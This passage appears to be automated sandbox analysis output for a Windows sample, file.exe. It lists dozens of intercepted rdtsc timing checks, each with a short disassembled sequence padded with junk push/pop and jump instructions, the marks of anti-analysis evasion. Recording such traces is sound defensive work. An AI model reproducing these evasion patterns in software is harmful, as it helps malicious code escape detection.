Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 986FE3 second address: 98700C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push edx 0x00000007 jmp 00007FAAC5092E5Eh 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jo 00007FAAC5092E62h 0x00000018 jl 00007FAAC5092E56h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98A7C4 second address: 98A7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98A7C8 second address: 98A7E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAC5092E64h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98A7E6 second address: 98A7FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A92h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98A7FC second address: 98A802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98A802 second address: 98A80C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FAAC5254A86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EDC1 second address: 98EDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98EF45 second address: 98EF49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98F2D9 second address: 98F2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E8EA second address: 98E8EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E8EE second address: 98E8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98E8FA second address: 98E8FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98FA0F second address: 98FA2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FAAC5092E56h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98FA2F second address: 98FA3F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAC5254A86h 0x00000008 jo 00007FAAC5254A86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98FD3C second address: 98FD4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jnp 00007FAAC5092E5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98FD4C second address: 98FD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98FD54 second address: 98FD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 98FD63 second address: 98FD7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91E0D4 second address: 91E0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FAAC5092E56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E0E0 second address: 91E0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FAAC5254A8Bh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E0FA second address: 91E100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E100 second address: 91E104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E104 second address: 91E11F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAAC5092E62h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9948F8 second address: 994909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994909 second address: 99490D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99490D second address: 99493D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A93h 0x00000007 jmp 00007FAAC5254A95h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99493D second address: 994947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAAC5092E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994947 second address: 99494D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99494D second address: 994960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FAAC5092E56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994960 second address: 994966 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 997ADA second address: 997AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FAAC5092E56h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C0F5 second address: 99C0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C0FF second address: 99C103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C3F4 second address: 99C3FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FAAC5254A86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C546 second address: 99C54A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C54A second address: 99C564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAAC5254A86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A8Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C564 second address: 99C56A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C81B second address: 99C81F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C81F second address: 99C828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C828 second address: 99C846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FAAC5254A86h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAC5254A8Dh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99C846 second address: 99C84B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB3B second address: 99CB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jmp 00007FAAC5254A8Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB54 second address: 99CB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB5A second address: 99CB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FAAC5254A99h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB7E second address: 99CB88 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CB88 second address: 99CBA6 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAC5254A8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007FAAC5254A86h 0x00000010 jl 00007FAAC5254A86h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CBA6 second address: 99CBB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99CF9D second address: 99D019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FAAC5254A8Ch 0x0000000e push esi 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FAAC5254A96h 0x00000016 pop esi 0x00000017 pushad 0x00000018 jmp 00007FAAC5254A90h 0x0000001d jmp 00007FAAC5254A93h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 push edi 0x0000002a pop edi 0x0000002b jc 00007FAAC5254A86h 0x00000031 jbe 00007FAAC5254A86h 0x00000037 popad 0x00000038 jmp 00007FAAC5254A94h 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D019 second address: 99D01F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D01F second address: 99D023 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D164 second address: 99D168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D168 second address: 99D188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A94h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99D188 second address: 99D18C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A07EE second address: 9A07F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9613 second address: 9A9617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A994B second address: 9A9962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A93h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9962 second address: 9A9988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007FAAC5092E64h 0x0000000c pop esi 0x0000000d jc 00007FAAC5092E5Eh 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9988 second address: 9A9990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9ABC second address: 9A9AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EAA2 second address: 95EAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EAA6 second address: 95EAB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9F04 second address: 9A9F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A9F08 second address: 9A9F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FAAC5092E56h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9ADD5F second address: 9ADD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AD7C5 second address: 9AD7D5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5092E56h 0x00000008 ja 00007FAAC5092E56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1C4D second address: 9B1C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1C52 second address: 9B1C6B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAAC5092E62h 0x00000008 push edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1065 second address: 9B1069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1069 second address: 9B1086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1301 second address: 9B1307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1307 second address: 9B130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1461 second address: 9B1465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1465 second address: 9B1492 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAC5092E61h 0x0000000b pop edx 0x0000000c jc 00007FAAC5092E6Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 jmp 00007FAAC5092E5Bh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B16DE second address: 9B16E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B16E2 second address: 9B1701 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAC5092E56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FAAC5092E63h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BA0E2 second address: 9BA0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8234 second address: 9B824A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E62h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B824A second address: 9B8265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A97h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8265 second address: 9B8275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 jnp 00007FAAC5092E56h 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8275 second address: 9B8296 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAC5254A97h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8296 second address: 9B829A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B901D second address: 9B9027 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAC5254A8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9027 second address: 9B902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9830 second address: 9B9834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9834 second address: 9B983A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9DC2 second address: 9B9DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9DC8 second address: 9B9DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF631 second address: 9BF63B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF63B second address: 9BF645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAC5092E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF645 second address: 9BF66F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jng 00007FAAC5254A86h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2810 second address: 9C2819 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2819 second address: 9C2835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2835 second address: 9C285A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAC5092E68h 0x0000000a jnc 00007FAAC5092E62h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C285A second address: 9C2860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29BE second address: 9C29C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29C4 second address: 9C29D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FAAC5254A86h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29D4 second address: 9C29DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FAAC5092E56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29DF second address: 9C29E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2B00 second address: 9C2B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2B05 second address: 9C2B0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B9FE second address: 90BA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E62h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BA1B second address: 90BA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2FFE second address: 9C302C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5092E5Ah 0x00000011 jmp 00007FAAC5092E68h 0x00000016 rdtsc
